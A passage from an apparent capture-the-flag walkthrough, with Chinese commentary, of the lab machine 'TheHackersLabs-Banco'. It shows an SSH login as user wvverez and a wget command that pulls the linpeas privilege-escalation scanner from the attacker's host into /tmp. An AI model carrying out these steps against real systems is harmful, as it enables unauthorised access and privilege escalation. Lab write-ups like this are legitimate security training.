┌──(root㉿kali)-[~] └─# ssh wvverez@192.168.100.50 The authenticity of host '192.168.100.50 (192.168.100.50)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:11: [hashed name] ~/.ssh/known_hosts:26: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.100.50' (ED25519) to the list of known hosts. wvverez@192.168.100.50's password: Permission denied, please try again. wvverez@192.168.100.50's password: Linux TheHackersLabs-Banco 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Jun 20 01:18:14 2026 from 192.168.91.191 wvverez@TheHackersLabs-Banco:~$ id uid=1001(wvverez) gid=1001(wvverez) grupos=1001(wvverez),100(users) wvverez@TheHackersLabs-Banco:~$
成功获取到wvverez用户的shell
wvverez -> root
继续尝试登录root
可以确定了是密码不对
上传linpeas扫描提权信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
wvverez@TheHackersLabs-Banco:~$ cd /tmp/ wvverez@TheHackersLabs-Banco:/tmp$ ls systemd-private-cec0c4d3c4ca44b5b5ae5744f329352f-apache2.service-dw0Jjz systemd-private-cec0c4d3c4ca44b5b5ae5744f329352f-systemd-logind.service-kNsH98 wvverez@TheHackersLabs-Banco:/tmp$ wget http://192.168.100.17/linpeas.sh.1 --2026-07-06 15:15:40-- http://192.168.100.17/linpeas.sh.1 Conectando con 192.168.100.17:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 1062554 (1,0M) [application/x-sh] Grabando a: «linpeas.sh.1»
linpeas.sh.1 100%[=================================================>] 1,01M --.-KB/s en 0,1s